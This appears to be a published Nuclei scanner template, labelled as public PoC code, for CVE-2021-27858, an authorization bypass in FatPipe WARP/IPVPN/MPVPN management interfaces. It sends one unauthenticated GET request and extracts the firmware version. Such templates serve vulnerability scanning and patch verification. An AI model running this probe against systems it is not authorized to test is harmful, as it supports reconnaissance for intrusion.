FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p91 and 10.2.2r42 contain a missing authorization caused by lack of access control in the web management interface, letting remote attackers access sensitive URLs, exploit requires no authentication.
PoC代码[已公开]
id: CVE-2021-27858
info:
name: FatPipe WARP/IPVPN/MPVPN - Authorization Bypass
author: gy741
severity: medium
description: |
FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p91 and 10.2.2r42 contain a missing authorization caused by lack of access control in the web management interface, letting remote attackers access sensitive URLs, exploit requires no authentication.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php
- https://www.fatpipeinc.com/support/advisories.php
- https://www.fatpipeinc.com/support/cve-list.php
- https://www.zeroscience.mk/codes/fatpipe_auth.txt
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2021-27858
cwe-id: CWE-862
epss-score: 0.37835
epss-percentile: 0.97026
cpe: cpe:2.3:o:fatpipeinc:warp_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: fatpipeinc
product: warp_firmware
tags: cve,cve2021,fatpipe,auth-bypass,router,vuln
http:
- raw:
- |
GET /fpui/jsp/index.jsp HTTP/1.1
Host: {{Hostname}}
Accept: */*
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "productType"
- "type:"
- "version:"
- "<title>FatPipe Networks</title>"
condition: and
extractors:
- type: regex
part: body
regex:
- 'version: "([0-9.a-z]+)"'
# digest: 4b0a004830460221008ceb73b395f808bee571496a4cd17223d433862049f906e8afb5a27a20fb6656022100a76bdd47e699acbcdd6f32993719389628b58fed2539dd24fe8ed7f66f63746d:922c64590222798bb761d5b6d8e72950